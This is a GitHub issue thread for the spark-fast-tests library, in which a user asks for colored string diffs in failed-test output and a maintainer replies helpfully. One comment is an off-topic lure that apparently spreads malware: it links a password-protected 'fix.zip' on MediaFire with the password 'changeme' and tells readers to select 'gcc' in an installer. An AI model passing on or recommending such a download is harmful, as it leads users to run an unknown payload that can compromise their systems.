### ISSUE TITLE
Feature request - add string diff to test

### ISSUE THREAD

**Issue by zem00n** [mrpowers-io/spark-fast-tests#136]
Hi! 

Is it possible to add string diff with color codes to failed tests output? That would simplify life. I am willing to create a PR for that. I am just not sure if you are interested in this feature.

Thanks!

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SemyonSinchenko** [comment]
Do I understand you right, that you want to be able to specify the color of mismatched rows? Like it is [done in Chispa (PySpark)](https://mrpowers.github.io/chispa/#customize-formatting), right?

**Comment by zem00n** [comment]
@SemyonSinchenko Yes. I see that Chispa is written for pyspark. Is there something scala in that sense?

**Comment by SemyonSinchenko** [comment]
> @SemyonSinchenko Yes. I see that Chispa is written for pyspark. Is there something scala in that sense?

At the moment there is nothing like this in scala-version, but we are [working](https://github.com/mrpowers-io/spark-fast-tests/issues/129) on it. If you are interested, feel free to open a PR! Any contribution is appreciated! Feel free to ping me here if you have more question.
